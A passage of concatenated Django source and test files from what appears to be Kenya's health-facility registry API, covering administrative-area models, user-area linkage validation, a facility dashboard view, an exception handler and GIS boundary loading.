chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthUnitContact.objects.count())
self.assertEquals(2, CommunityHealthUnitContact.objects.filter(
health_unit=chu_refetched).count())
```
#### File: common/models/model_declarations.py
```python
import logging
import reversion
import json
from django.db import models
from django.conf import settings
from django.utils import encoding, timezone
from rest_framework.exceptions import ValidationError
from ..fields import SequenceField
from .base import AbstractBase, SequenceMixin
LOGGER = logging.getLogger(__file__)
ERROR_TYPES = (
(
'SEARCH_INDEXING_ERROR',
'An error that occurred during search indexing'
),
(
'SEND_EMAIL_ERROR',
'An error that occurs when sending a user email'
)
)
class UserAdminAreaLinkageMixin(object):
def should_update_user_area(self, *args, **kwargs):
"""
Ensure that a user is assigned to a certain admin area once.
If one wants to remove the user from the area, then
they should use deactivate the record and to link back the user to the
admin area they should activate the record
"""
try:
if kwargs.pop('field_name', None) == 'constituency':
old_obj = self.__class__.objects.get(
user=self.user, constituency=self.constituency)
else:
old_obj = self.__class__.objects.get(
user=self.user, county=self.county)
active_list = [old_obj.active, self.active]
return active_list.count(True) == 1
except self.__class__.DoesNotExist:
# the record is being created for the first time
return True
@reversion.register
@encoding.python_2_unicode_compatible
class ContactType(AbstractBase):
"""
Captures the different types of contacts that we have in the real world.
The most common contacts are email, phone numbers, land-line etc.
"""
name = models.CharField(
max_length=100, unique=True,
help_text="A short name, preferably 6 characters long, "
"representing a certain type of contact e.g EMAIL")
description = models.TextField(
null=True, blank=True,
help_text='A brief description of the contact type.')
def __str__(self):
return self.name
@reversion.register(follow=['contact_type'])
@encoding.python_2_unicode_compatible
class Contact(AbstractBase):
"""
Holds ways in which entities can communicate.
The communication ways are not limited provided that all parties
willing to communicate will be able to do so. The communication
ways may include emails, phone numbers, landlines etc.
"""
contact = models.CharField(
max_length=100,
help_text="The actual contact of the person e.g <EMAIL>,"
" 07XXYYYZZZ")
contact_type = models.ForeignKey(
ContactType,
help_text="The type of contact that the given contact is e.g email"
" or phone number",
on_delete=models.PROTECT)
def __str__(self):
return "{}: {}".format(self.contact_type.name, self.contact)
class Meta(AbstractBase.Meta):
unique_together = ('contact', 'contact_type')
class AdministrativeUnitBase(SequenceMixin, AbstractBase):
"""Base class for County, Constituency and Ward"""
name = models.CharField(
max_length=100,
help_text="Name of the administrative unit e.g Nairobi")
code = SequenceField(
unique=True,
help_text="A unique_code 4 digit number representing the region.")
def save(self, *args, **kwargs):
if not self.code:
self.code = self.generate_next_code_sequence()
super(AdministrativeUnitBase, self).save(*args, **kwargs)
class Meta(AbstractBase.Meta):
abstract = True
def _lookup_facility_coordinates(area_boundary):
"""A helper used by the County, Constituency and Ward classes"""
from mfl_gis.models import FacilityCoordinates
facility_coordinates = FacilityCoordinates.objects.filter(
coordinates__contained=area_boundary.mpoly
) if area_boundary and area_boundary.mpoly else []
return [
{
"name": facility_coordinate.facility.name,
"geometry": json.loads(facility_coordinate.coordinates.geojson)
}
for facility_coordinate in facility_coordinates
]
@reversion.register
@encoding.python_2_unicode_compatible
class County(AdministrativeUnitBase):
"""
This is the largest administrative/political division in Kenya.
Kenya is divided in 47 different counties.
Code generation is handled by the custom save method in
AdministrativeUnitBase
"""
@property
def facility_coordinates(self):
"""Look up the facilities that are in this unit's boundaries"""
try:
return _lookup_facility_coordinates(self.countyboundary)
except: # Handling RelatedObjectDoesNotExist is a little funky
LOGGER.info('No boundaries found for {}'.format(self))
return _lookup_facility_coordinates(None)
@property
def county_bound(self):
from mfl_gis.models import CountyBoundary
unit = CountyBoundary.objects.filter(area=self)
return unit[0].bound if len(unit) else {}
def __str__(self):
return self.name
class Meta(AdministrativeUnitBase.Meta):
verbose_name_plural = 'counties'
@reversion.register(follow=['county'])
@encoding.python_2_unicode_compatible
class Constituency(AdministrativeUnitBase):
"""
Counties in Kenya are divided into constituencies.
A Constituency is a political sub division of a county.
There are 290 constituencies in total.
In most cases they coincide with sub counties.
Code generation is handled by the custom save method in
AdministrativeUnitBase
"""
county = models.ForeignKey(
County,
help_text="Name of the county where the constituency is located",
on_delete=models.PROTECT)
def __str__(self):
return self.name
@property
def constituency_bound(self):
from mfl_gis.models import ConstituencyBoundary
unit = ConstituencyBoundary.objects.filter(area=self)
return unit[0].bound if len(unit) else {}
class Meta(AdministrativeUnitBase.Meta):
verbose_name_plural = 'constituencies'
unique_together = ('name', 'county')
@reversion.register(follow=['county'])
@encoding.python_2_unicode_compatible
class SubCounty(AdministrativeUnitBase):
"""
A county can be sub divided into sub counties.
The sub-counties do not necessarily map to constituencies
"""
county = models.ForeignKey(County, on_delete=models.PROTECT)
def __str__(self):
return self.name
@reversion.register(follow=['constituency'])
@encoding.python_2_unicode_compatible
class Ward(AdministrativeUnitBase):
"""
The Kenyan counties are sub divided into wards.
This is an administrative sub-division of the counties.
A constituency can have one or more wards.
In most cases the sub county is also the constituency.
Code generation is handled by the custom save method in
AdministrativeUnitBase
"""
constituency = models.ForeignKey(
Constituency,
help_text="The constituency where the ward is located.",
on_delete=models.PROTECT)
sub_county = models.ForeignKey(
SubCounty, null=True, blank=True,
help_text='The sub-county where the ward is located',
on_delete=models.PROTECT)
def __str__(self):
return self.name
@property
def county(self):
return self.constituency.county
@property
def facility_coordinates(self):
"""Look up the facilities that are in this unit's boundaries"""
try:
return _lookup_facility_coordinates(self.wardboundary)
except: # Handling RelatedObjectDoesNotExist is a little funky
LOGGER.info('No boundaries found for {}'.format(self))
return _lookup_facility_coordinates(None)
def validate_county(self):
if self.sub_county:
if not self.sub_county.county == self.constituency.county:
raise ValidationError(
{
"sub_county": [
"Ensure the sub-county and the constituency "
"are in the same county"
]
}
)
def clean(self, *args, **kwargs):
super(Ward, self).clean(*args, **kwargs)
self.validate_county()
@reversion.register(follow=['user', 'county'])
@encoding.python_2_unicode_compatible
class UserCounty(UserAdminAreaLinkageMixin, AbstractBase):
"""
Will store a record of the counties that a user has been in-charge of.
A user can only be in-charge of only one county at a time.
"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name='user_counties',
on_delete=models.PROTECT)
county = models.ForeignKey(County, on_delete=models.PROTECT)
def __str__(self):
return "{}: {}".format(self.user, self.county)
def clean(self, *args, **kwargs):
super(UserCounty, self).clean(*args, **kwargs)
def save(self, *args, **kwargs):
self.full_clean(exclude=None)
super(UserCounty, self).save(*args, **kwargs) if \
self.should_update_user_area(field_name='county') else None
class Meta(AbstractBase.Meta):
verbose_name_plural = 'user_counties'
@reversion.register(follow=['user', 'contact'])
@encoding.python_2_unicode_compatible
class UserContact(AbstractBase):
"""
Stores a user's contacts.
"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
related_name='user_contacts', on_delete=models.PROTECT)
contact = models.ForeignKey(Contact)
def __str__(self):
return "{}: ({})".format(self.user, self.contact)
def validate_user_linked_to_a_certain_contact_once(self):
"""
Ensures that user contacts are not duplicated
"""
user_contact_instance_count = self.__class__.objects.filter(
user=self.user, contact=self.contact).count()
if user_contact_instance_count > 0 and not self.deleted:
msg = "The user contact {0} is already added to the user".format(
self.contact.contact)
raise ValidationError(
{
"contact": [msg]
})
def clean(self, *args, **kwargs):
super(UserContact, self).clean(*args, **kwargs)
self.validate_user_linked_to_a_certain_contact_once()
@reversion.register(follow=['user', 'constituency'])
@encoding.python_2_unicode_compatible
class UserConstituency(UserAdminAreaLinkageMixin, AbstractBase):
user = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name='user_constituencies')
constituency = models.ForeignKey(Constituency)
def validate_constituency_county_in_creator_county(self):
error = {
"constituency": [
"Users created must be in the administrators "
"county or sub county"
]
}
nat_user = self.created_by.is_national or self.updated_by.is_national
if self.created_by.constituency:
if self.constituency.county != self.created_by.constituency.county:
raise ValidationError(error)
elif (self.constituency.county != self.created_by.county and not
nat_user):
raise ValidationError(error)
def clean(self, *args, **kwargs):
self.validate_constituency_county_in_creator_county()
def __str__(self):
return "{}: {}".format(self.user, self.constituency)
def save(self, *args, **kwargs):
self.full_clean(exclude=None)
super(UserConstituency, self).save(*args, **kwargs) if \
self.should_update_user_area(field_name='constituency') else None
class Meta(object):
verbose_name_plural = 'user constituencies'
@reversion.register
@encoding.python_2_unicode_compatible
class Town(AbstractBase):
name = models.CharField(
max_length=255, unique=True, null=True, blank=True,
help_text="Name of the town")
def __str__(self):
return self.name
@reversion.register(follow=['town', ])
@encoding.python_2_unicode_compatible
class PhysicalAddress(AbstractBase):
"""
The physical properties of a facility.
These are physical properties of the facility and included is the
plot number and nearest landmark. This information in conjunction with
GPS codes is useful in locating the facility.
"""
town = models.ForeignKey(
Town, null=True, blank=True,
help_text="The town where the entity is located e.g Nakuru")
nearest_landmark = models.TextField(
null=True, blank=True,
help_text="well-known physical features /structure that can be used to"
" simplify directions to a given place. e.g town market or village ")
plot_number = models.CharField(
max_length=100, null=True, blank=True,
help_text="This is the same number found on the title deeds of the"
"piece of land on which this facility is located")
location_desc = models.TextField(
null=True, blank=True,
help_text="This field allows a more detailed description of "
"the location")
def __str__(self):
return self.location_desc
class Meta(AbstractBase.Meta):
verbose_name_plural = 'physical addresses'
@reversion.register
@encoding.python_2_unicode_compatible
class DocumentUpload(AbstractBase):
name = models.CharField(max_length=255, unique=True)
description = models.TextField(null=True, blank=True)
fyl = models.FileField()
def __str__(self):
return self.name
@reversion.register
@encoding.python_2_unicode_compatible
class ErrorQueue(models.Model):
"""
A model to store errors that occur when processing data
"""
object_pk = models.CharField(max_length=100, null=True, blank=True)
app_label = models.CharField(max_length=100, null=True, blank=True)
model_name = models.CharField(max_length=100, null=True, blank=True)
resolved = models.BooleanField(default=False)
retries = models.IntegerField(default=0)
except_message = models.TextField(null=True, blank=True)
error_type = models.CharField(choices=ERROR_TYPES, max_length=100)
created = models.DateTimeField(default=timezone.now)
class Meta(object):
unique_together = ('object_pk', 'app_label', 'model_name')
ordering = ('-created', )
def __str__(self):
return "{} - {} - {}".format(
self.object_pk, self.app_label, self.model_name)
class UserSubCounty(AbstractBase):
"""
Link a user to a sub-county
"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name='user_sub_counties')
sub_county = models.ForeignKey(SubCounty, on_delete=models.PROTECT)
def __str__(self):
return "{0} - {1}".format(
self.user.email, self.sub_county.name)
```
#### File: common/tests/test_models.py
```python
from datetime import timedelta, datetime
from django.test import TestCase
from django.contrib.auth import get_user_model
from rest_framework.exceptions import ValidationError
from django.conf import settings
from django.utils import timezone
from model_mommy import mommy
from ..models import (
Contact,
County,
Ward,
Constituency,
Town,
ContactType,
PhysicalAddress,
UserCounty,
UserContact,
UserConstituency,
SubCounty,
ErrorQueue
)
from facilities.models import RegulationStatus
class AbstractBaseModelTest(TestCase):
def setUp(self):
self.leo = timezone.now()
self.jana = timezone.now() - timedelta(days=1)
self.juzi = timezone.now() - timedelta(days=2)
self.user_1 = mommy.make(settings.AUTH_USER_MODEL)
self.user_2 = mommy.make(settings.AUTH_USER_MODEL)
def test_validate_updated_date_greater_than_created(self):
fake = ContactType(created=self.leo, updated=self.jana)
with self.assertRaises(ValidationError) as ve:
fake.validate_updated_date_greater_than_created()
self.assertTrue(
'The updated date cannot be less than the created date'
in ve.exception.detail)
def test_preserve_created_and_created_by(self):
# Create a new instance
fake = mommy.make(ContactType, created=self.jana, updated=self.leo,
created_by=self.user_1, updated_by=self.user_1)
# Switch the create
fake.created = self.juzi
fake.save()
self.assertEqual(self.jana, fake.created)
# Switch created_by
fake.created_by = self.user_2
fake.updated_by = self.user_2
fake.save()
self.assertEqual(self.user_1.id, fake.created_by.id)
self.assertEqual(self.user_2.id, fake.updated_by.id)
def test_delete_override(self):
bp_type = mommy.make(ContactType, created=timezone.now(),
updated=timezone.now())
bp_type.delete()
with self.assertRaises(ContactType.DoesNotExist):
self.assertTrue(ContactType.objects.get(
pk=bp_type.id))
assert ContactType.everything.get(pk=bp_type.id)
def test_timezone(self):
naive_datetime = datetime.now()
instance = mommy.make(ContactType)
instance.updated = naive_datetime
with self.assertRaises(ValidationError):
instance.save()
naive_after_object_is_saved = datetime.now()
instance.updated = naive_after_object_is_saved
instance.save()
self.assertTrue(timezone.is_aware(instance.updated))
# Test that we don't need to make created timezone aware
# It is already tizezone aware
self.assertTrue(timezone.is_aware(instance.created))
created_naive_datetime = datetime.now()
instance.create = created_naive_datetime # This should not even update
instance.save()
self.assertTrue(timezone.is_aware(instance.created))
class BaseTestCase(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_superuser(
email='<EMAIL>',
first_name='Test',
employee_number='2124124124',
password='<PASSWORD>',
is_national=True
)
self.default_regulation_status = mommy.make(
RegulationStatus, name="Pending Regulation", is_default=True)
super(BaseTestCase, self).setUp()
def inject_audit_fields(self, data):
data["created_by"] = self.user
data["updated_by"] = self.user
data["created"] = timezone.now()
data["updated"] = timezone.now()
return data
class TestContactModel(BaseTestCase):
def test_save_contact(self):
contact_type = mommy.make(ContactType, name='EMAIL')
contact_data = {
"contact": "<EMAIL>",
"contact_type": contact_type
}
contact_data = self.inject_audit_fields(contact_data)
Contact.objects.create(**contact_data)
self.assertEquals(1, Contact.objects.count())
def test_save_model_with_id(self):
contact_type = mommy.make(ContactType)
Contact.objects.create(
pk='1a049a8a-6e1f-4427-9098-a779cf9f63fa',
contact='375818195',
contact_type=contact_type)
self.assertEquals(1, Contact.objects.count())
class TestCountyModel(BaseTestCase):
def test_save_county(self):
county_data = {
"name": "WAJIR"
}
county_data = self.inject_audit_fields(county_data)
county = County.objects.create(**county_data)
self.assertEquals(1, County.objects.count())
self.assertIsNotNone(county.code)
def test_county_code_seq(self):
# make code None so that model mommy does not supply it
county = mommy.make(County, code=None)
county_2 = mommy.make(County, code=None)
county_2_code = int(county.code) + 1
self.assertEquals(county_2_code, county_2.code)
def test_lookup_facility_coordinates(self):
county = mommy.make(County)
self.assertEqual(
county.facility_coordinates,
[]
)
def test_county_bound(self):
county = mommy.make(County)
self.assertEqual(
county.county_bound,
{}
)
class TestConstituencyModel(BaseTestCase):
def setUp(self):
super(TestConstituencyModel, self).setUp()
self.county = County.objects.create(
updated_by=self.user, created_by=self.user,
name='county')
def test_save_constituency(self):
constituency_data = {
"name": "KAPSA",
"county": self.county
}
constituency_data = self.inject_audit_fields(constituency_data)
constituency = Constituency.objects.create(**constituency_data)
self.assertEquals(1, Constituency.objects.count())
self.assertIsNotNone(constituency.code)
def test_constituency_code_sequence(self):
constituency_1 = mommy.make(Constituency, code=None)
constituency_2 = mommy.make(Constituency, code=None)
constituency_2_code = int(constituency_1.code) + 1
self.assertEquals(constituency_2_code, int(constituency_2.code))
def test_consituency_bound(self):
const = mommy.make(Constituency)
self.assertEqual(
const.constituency_bound,
{}
)
class TestWardModel(BaseTestCase):
def setUp(self):
super(TestWardModel, self).setUp()
county = mommy.make(County)
self.constituency = Constituency.objects.create(
created_by=self.user, updated_by=self.user,
name='constituency', county=county)
def test_save_ward(self):
data = {
"name": "KAPSA",
"constituency": self.constituency
}
data = self.inject_audit_fields(data)
ward = Ward.objects.create(**data)
self.assertEquals(1, Ward.objects.count())
self.assertIsNotNone(ward.code)
def test_sub_county_code_seq(self):
sub_county_1 = mommy.make(Ward, code=None)
sub_county_2 = mommy.make(Ward, code=None)
sub_county_2_code = int(sub_county_1.code) + 1
self.assertEquals(sub_county_2_code, int(sub_county_2.code))
def test_get_county(self):
county = mommy.make(County)
constituency = mommy.make(Constituency, county=county)
ward = mommy.make(Ward, constituency=constituency)
self.assertEquals(county, ward.county)
def test_ward_county(self):
# test that the county for the sub-county and the constituency
# are the same
sub_county = mommy.make(SubCounty)
const = mommy.make(Constituency)
with self.assertRaises(ValidationError):
mommy.make(Ward, constituency=const, sub_county=sub_county)
class TestPhysicalAddress(BaseTestCase):
def test_save(self):
data = {
"town": mommy.make(Town, name="Nairobi"),
"nearest_landmark": "",
"plot_number": "35135"
}
data = self.inject_audit_fields(data)
PhysicalAddress.objects.create(**data)
self.assertEquals(1, PhysicalAddress.objects.count())
class TestUserCountyModel(BaseTestCase):
def test_save(self):
user = mommy.make(get_user_model())
county = mommy.make(County)
data = {
"user": user,
"county": county
}
UserCounty.objects.create(**data)
self.assertEquals(1, UserCounty.objects.count())
def test_user_linked_to_a_county_once(self):
user = mommy.make(get_user_model())
county = mommy.make(County)
# First time should save with no issue
user_county_rec = mommy.make(UserCounty, user=user, county=county)
# Deactivating the record should have no incident
user_county_rec.active = False
user_county_rec.save()
self.assertFalse(UserCounty.objects.get(user=user).active)
user_county_rec.active = True
user_county_rec.save()
self.assertTrue(UserCounty.objects.get(user=user).active)
class TestUserContactModel(BaseTestCase):
def test_save(self):
user = mommy.make(get_user_model())
contact = mommy.make(Contact)
data = {
"user": user,
"contact": contact
}
data = self.inject_audit_fields(data)
UserContact.objects.create(**data)
self.assertEquals(1, UserContact.objects.count())
def test_user_and_contact_unique(self):
contact = mommy.make(Contact)
user = mommy.make(get_user_model())
mommy.make(UserContact, user=user, contact=contact)
with self.assertRaises(ValidationError):
mommy.make(UserContact, user=user, contact=contact)
def test_user_contact_deletion(self):
contact = mommy.make(Contact)
user = mommy.make(get_user_model())
user_contact = mommy.make(UserContact, user=user, contact=contact)
self.assertEquals(1, UserContact.objects.filter(user=user).count())
user_contact.delete()
self.assertEquals(0, UserContact.objects.filter(user=user).count())
class TestUserConstituencyModel(BaseTestCase):
def test_save(self):
user = mommy.make(get_user_model())
county = mommy.make(County)
const = mommy.make(Constituency, county=county)
creator_user = mommy.make(get_user_model())
mommy.make(
UserCounty, county=county, user=creator_user)
mommy.make(
UserConstituency, constituency=const, user=user,
created_by=creator_user)
self.assertEquals(1, UserConstituency.objects.count())
def test_validator_constituency_in_creators_county(self):
county = mommy.make(County)
county_2 = mommy.make(County)
const = mommy.make(Constituency, county=county)
const_2 = mommy.make(Constituency, county=county_2)
user = mommy.make(get_user_model())
user_2 = mommy.make(get_user_model())
creator_user = mommy.make(get_user_model())
mommy.make(UserCounty, county=county, user=creator_user)
# should save without incidence
mommy.make(
UserConstituency, user=user, constituency=const,
created_by=creator_user
)
self.assertEquals(1, UserConstituency.objects.count())
# should raise validation error'
with self.assertRaises(ValidationError):
mommy.make(UserConstituency, user=user_2, constituency=const_2)
# test user constituencies
self.assertEquals(const, user.constituency)
def test_user_created_is_in_the_creators_sub_county(self):
county = mommy.make(County)
constituency = mommy.make(Constituency, county=county)
constituency_2 = mommy.make(Constituency)
user = mommy.make(get_user_model())
user_2 = mommy.make(get_user_model())
user_3 = mommy.make(get_user_model())
mommy.make(UserCounty, county=county, user=user)
mommy.make(
UserConstituency, constituency=constituency,
user=user_2, created_by=user, updated_by=user)
# the user being created and the creating user are not in
# the same constituency
with self.assertRaises(ValidationError):
mommy.make(
UserConstituency, constituency=constituency_2,
user=user_3, created_by=user_2, updated_by=user_2)
def test_user_linked_to_a_constituency_once(self):
user = mommy.make(get_user_model())
county = mommy.make(County)
const = mommy.make(Constituency, county=county)
creator_user = mommy.make(get_user_model())
mommy.make(UserCounty, user=creator_user, county=county)
# First time should save with no issue
user_const_rec = mommy.make(
UserConstituency, user=user, constituency=const,
created_by=creator_user, updated_by=creator_user)
# Deactivating the record should have no incident
user_const_rec.active = False
user_const_rec.save()
self.assertFalse(UserConstituency.objects.get(user=user).active)
user_const_rec.active = True
user_const_rec.save()
self.assertTrue(UserConstituency.objects.get(user=user).active)
class TestSubCounty(TestCase):
def test_save(self):
mommy.make(SubCounty)
self.assertEquals(1, SubCounty.objects.count())
class TestErrorQueue(TestCase):
def test_save(self):
mommy.make(ErrorQueue)
self.assertEquals(1, ErrorQueue.objects.count())
def test_representation(self):
error = mommy.make(
ErrorQueue,
object_pk='1',
app_label='users',
model_name='MflUser')
string_rep = "1 - users - MflUser"
self.assertEquals(string_rep, error.__str__())
```
#### File: common/utilities/views.py
```python
from rest_framework import generics
class CustomDestroyModelMixin(object):
def perform_destroy(self, instance):
instance.deleted = True
instance.save()
class CustomRetrieveUpdateDestroyView(
CustomDestroyModelMixin, generics.RetrieveUpdateDestroyAPIView):
pass
```
#### File: mfl_api/config/__init__.py
```python
def get_version(v):
"""
Generate a PEP386 compliant version
Stolen from django.utils.version.get_version
:param v tuple: A five part tuple indicating the version
:returns str: Compliant version
"""
assert isinstance(v, tuple)
assert len(v) == 5
assert v[3] in ('alpha', 'beta', 'rc', 'final')
parts = 2 if v[2] == 0 else 3
main = '.'.join(str(i) for i in v[:parts])
sub = ''
if v[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[v[3]] + str(v[4])
return str(main + sub)
VERSION = (2, 0, 0, 'alpha', 8)
__version__ = get_version(VERSION)
try:
from settings import * # noqa
except ImportError: # Will occur on first install
pass # NOQA
```
#### File: mfl_api/exception_handler/handler.py
```python
from django.core.exceptions import ValidationError
from rest_framework.response import Response
from rest_framework.views import exception_handler
from rest_framework import status
import logging
LOGGER = logging.getLogger(__name__)
def custom_exception_handler(exc, context):
"""
Django Restframework fails silently to the errors it doesn't handle.
This handler will bubble up errors that are not handled by DRF.
Users of this handler will have to catch the error themselves..
..NOTE : ValidationErrors esp django model errors are context specific
hence handling them here will provide a generic message that won't
be helpful for that context..therefore they are better handled by the
users themselves.
"""
response = exception_handler(exc, context)
if response:
return response
if isinstance(exc, ValidationError):
LOGGER.error(exc)
return Response(exc, status=status.HTTP_400_BAD_REQUEST)
else:
data = {'detail': ['Server Error: {}'.format(exc.__class__.__name__)]}
# Keep this or you'll pull your hair out when **** hits the fan
import traceback
traceback.print_exc()
LOGGER.error(exc)
return Response(data, status=500)
```
#### File: facilities/views/facility_dashboard.py
```python
from datetime import timedelta
from django.utils import timezone
from django.db.models import Q
from rest_framework.views import APIView, Response
from common.models import County, SubCounty, Ward
from chul.models import CommunityHealthUnit
from ..models import (
OwnerType,
Owner,
FacilityStatus,
FacilityType,
Facility
)
from ..views import QuerysetFilterMixin
class DashBoard(QuerysetFilterMixin, APIView):
queryset = Facility.objects.all()
def get_chu_count_in_county_summary(self, county):
return CommunityHealthUnit.objects.filter(
facility__ward__sub_county__county=county).count()
def get_chu_count_in_constituency_summary(self, const):
return CommunityHealthUnit.objects.filter(
facility__ward__sub_county=const).count()
def get_chu_count_in_ward_summary(self, ward):
return CommunityHealthUnit.objects.filter(
facility__ward=ward).count()
def get_facility_county_summary(self):
counties = County.objects.all()
facility_county_summary = {}
for county in counties:
facility_county_count = self.get_queryset().filter(
ward__sub_county__county=county).count()
facility_county_summary[str(county.name)] = facility_county_count
top_10_counties = sorted(
facility_county_summary.items(),
key=lambda x: x[1], reverse=True)[0:20]
facility_county_summary
top_10_counties_summary = []
for item in top_10_counties:
county = County.objects.get(name=item[0])
chu_count = self.get_chu_count_in_county_summary(county)
top_10_counties_summary.append(
{
"name": item[0],
"count": item[1],
"chu_count": chu_count
})
return top_10_counties_summary if self.request.user.is_national else []
def get_facility_constituency_summary(self):
constituencies = SubCounty.objects.filter(
county=self.request.user.county)
constituencies = constituencies if self.request.user.county else []
facility_constituency_summary = {}
for const in constituencies:
facility_const_count = self.get_queryset().filter(
ward__sub_county=const).count()
facility_constituency_summary[
str(const.name)] = facility_const_count
top_10_consts = sorted(
facility_constituency_summary.items(),
key=lambda x: x[1], reverse=True)[0:20]
top_10_consts_summary = []
for item in top_10_consts:
const = SubCounty.objects.get(name=item[0])
chu_count = self.get_chu_count_in_constituency_summary(const)
top_10_consts_summary.append(
{
"name": item[0],
"count": item[1],
"chu_count": chu_count
})
return top_10_consts_summary
def get_facility_ward_summary(self):
wards = Ward.objects.filter(
sub_county=self.request.user.sub_county) \
if self.request.user.sub_county else []
facility_ward_summary = {}
for ward in wards:
facility_ward_count = self.get_queryset().filter(
ward=ward).count()
facility_ward_summary[
str(ward.name + "|" + str(ward.code))] = facility_ward_count
top_10_wards = sorted(
facility_ward_summary.items(),
key=lambda x: x[1], reverse=True)[0:20]
top_10_wards_summary = []
for item in top_10_wards:
ward = Ward.objects.get(code=item[0].split('|')[1])
chu_count = self.get_chu_count_in_ward_summary(ward)
top_10_wards_summary.append(
{
"name": item[0].split('|')[0],
"count": item[1],
"chu_count": chu_count
})
return top_10_wards_summary
def get_facility_type_summary(self):
facility_types = FacilityType.objects.all()
facility_type_summary = []
for facility_type in facility_types:
facility_type_summary.append(
{
"name": str(facility_type.name),
"count": self.get_queryset().filter(
facility_type=facility_type).count()
})
facility_type_summary_sorted = sorted(
facility_type_summary,
key=lambda x: x, reverse=True)[0:5]
return facility_type_summary_sorted
def get_facility_owner_summary(self):
owners = Owner.objects.all()
facility_owners_summary = []
for owner in owners:
facility_owners_summary.append(
{
"name": owner.name,
"count": self.get_queryset().filter(
owner=owner).count()
})
return facility_owners_summary
def get_facility_status_summary(self):
statuses = FacilityStatus.objects.all()
status_summary = []
for status in statuses:
status_summary.append(
{
"name": status.name,
"count": self.get_queryset().filter(
operation_status=status).count()
})
return status_summary
def get_facility_owner_types_summary(self):
owner_types = OwnerType.objects.all()
owner_types_summary = []
for owner_type in owner_types:
owner_types_summary.append(
{
"name": owner_type.name,
"count": self.get_queryset().filter(
owner__owner_type=owner_type).count()
})
return owner_types_summary
def get_recently_created_facilities(self):
right_now = timezone.now()
last_week = self.request.query_params.get('last_week', None)
last_month = self.request.query_params.get('last_month', None)
last_three_months = self.request.query_params.get(
'last_three_months', None)
three_months_ago = right_now - timedelta(days=90)
if last_week:
weekly = right_now - timedelta(days=7)
return self.get_queryset().filter(
created__gte=weekly).count()
if last_month:
monthly = right_now - timedelta(days=30)
return self.get_queryset().filter(
created__gte=monthly).count()
if last_three_months:
return self.get_queryset().filter(
created__gte=three_months_ago).count()
return self.get_queryset().filter(
created__gte=three_months_ago).count()
def get_recently_created_chus(self):
right_now = timezone.now()
last_week = self.request.query_params.get('last_week', None)
last_month = self.request.query_params.get('last_month', None)
last_three_months = self.request.query_params.get(
'last_three_months', None)
three_months_ago = right_now - timedelta(days=90)
if last_week:
weekly = right_now - timedelta(days=7)
return CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset(),
created__gte=weekly).count()
if last_month:
monthly = right_now - timedelta(days=30)
return CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset(),
created__gte=monthly).count()
if last_three_months:
return CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset(),
date_established__gte=three_months_ago).count()
return CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset(),
date_established__gte=three_months_ago).count()
def facilities_pending_approval_count(self):
updated_pending_approval = self.get_queryset().filter(has_edits=True)
newly_created = self.queryset.filter(approved=False, rejected=False)
return len(
list(set(list(updated_pending_approval) + list(newly_created)))
)
def get_chus_pending_approval(self):
"""
Get the number of CHUs pending approval
"""
return CommunityHealthUnit.objects.filter(
Q(is_approved=False, is_rejected=False) |
Q(has_edits=True)).distinct().filter(
facility__in=self.get_queryset()).count()
def get_rejected_chus(self):
"""
Get the number of CHUs that have been rejected
"""
return CommunityHealthUnit.objects.filter(is_rejected=True).count()
def get_rejected_facilities_count(self):
return self.get_queryset().filter(rejected=True).count()
def get_closed_facilities_count(self):
return self.get_queryset().filter(closed=True).count()
def get(self, *args, **kwargs):
user = self.request.user
data = {
"total_facilities": self.get_queryset().count(),
"county_summary": self.get_facility_county_summary()
if user.is_national else [],
"constituencies_summary": self.get_facility_constituency_summary()
if user.county else [],
"wards_summary": self.get_facility_ward_summary()
if user.constituency else [],
"owners_summary": self.get_facility_owner_summary(),
"types_summary": self.get_facility_type_summary(),
"status_summary": self.get_facility_status_summary(),
"owner_types": self.get_facility_owner_types_summary(),
"recently_created": self.get_recently_created_facilities(),
"recently_created_chus": self.get_recently_created_chus(),
"pending_updates": self.facilities_pending_approval_count(),
"rejected_facilities_count": self.get_rejected_facilities_count(),
"closed_facilities_count": self.get_closed_facilities_count(),
"rejected_chus": self.get_rejected_chus(),
"chus_pending_approval": self.get_chus_pending_approval(),
"total_chus": CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset()).count()
}
fields = self.request.query_params.get("fields", None)
if fields:
required = fields.split(",")
required_data = {
i: data[i] for i in data if i in required
}
return Response(required_data)
return Response(data)
```
#### File: management/commands/load_kenyan_administrative_boundaries.py
```python
from django.core.management import BaseCommand
from mfl_gis.models import CountyBoundary, ConstituencyBoundary, WardBoundary
from common.models import County, Constituency, Ward
from .shared import _load_boundaries
class Command(BaseCommand):
"""Load the boundaries of counties, constituencies and wards"""
def handle(self, *args, **options):
_load_boundaries(
feature_type='counties',
boundary_cls=CountyBoundary,
admin_area_cls=County,
name_field='COUNTY_NAM',
code_field='COUNTY_COD'
)
_load_boundaries(
feature_type='constituencies',
boundary_cls=ConstituencyBoundary,
admin_area_cls=Constituency,
name_field='CONSTITUEN',
code_field='CONST_CODE'
)
_load_boundaries(
feature_type='wards',
boundary_cls=WardBoundary,
admin_area_cls=Ward,
name_field='COUNTY_A_1',
code_field='COUNTY_ASS'
)
```
#### File: mfl_api/mfl_gis/pagination.py
```python
from rest_framework.pagination import PageNumberPagination
class GISPageNumberPagination(PageNumberPagination):
def get_page_size(self, request):
"""Impractically high limit; ensures we always return all boundaries"""
return 1500000
```
#### File: mfl_gis/tests/test_views.py
```python
from rest_framework.test import APITestCase
from common.tests.test_views import LoginMixin
from common.models import Ward, County, Constituency
from django.core.urlresolvers import reverse
from model_mommy import mommy
from facilities.models import FacilityUpdates, Facility
from ..models import (
WorldBorder,
CountyBoundary,
ConstituencyBoundary,
WardBoundary,
FacilityCoordinates,
GeoCodeMethod,
GeoCodeSource
)
from ..serializers import WorldBorderDetailSerializer
class TestCountryBoundariesView(LoginMixin, APITestCase):
def test_retrieve_single_country_boundary(self):
country = mommy.make(WorldBorder)
url = reverse(
'api:mfl_gis:world_border_detail', kwargs={'pk': country.pk})
response = self.client.get(url)
